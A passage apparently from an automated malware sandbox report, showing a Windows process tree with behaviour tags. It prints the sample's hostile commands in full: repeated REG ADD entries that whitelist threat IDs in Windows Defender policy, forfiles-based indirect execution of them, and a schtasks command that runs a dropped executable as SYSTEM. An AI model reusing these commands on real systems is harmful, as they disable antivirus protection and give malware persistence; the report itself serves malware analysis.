                                                                                                                                                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                        PID:6712
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                          PID:428
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6172
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3392
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5048
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3932
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2928
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:6584
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                      PID:6900
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5744
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:32
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5680
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3212
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5408
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6532
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3456
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:6396
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                      PID:2608
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2512
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                        PID:1328
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5996
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4596
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:376
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:5700
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                PID:5872
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7012
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7092
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5628
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3612
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2792
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 01:33:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\iZBVtro.exe\" 9Z /S" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5568
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4508
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 756
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5548
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5548
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:692
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5804
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6868
                                                                                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6360
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\iZBVtro.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\iZBVtro.exe 9Z /S
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6760
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:6476
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6828
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:624
                                                                                                                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5640
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4296
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6968
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4784
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5496
                                                                                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7052
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3024
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3048
                                                                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4424
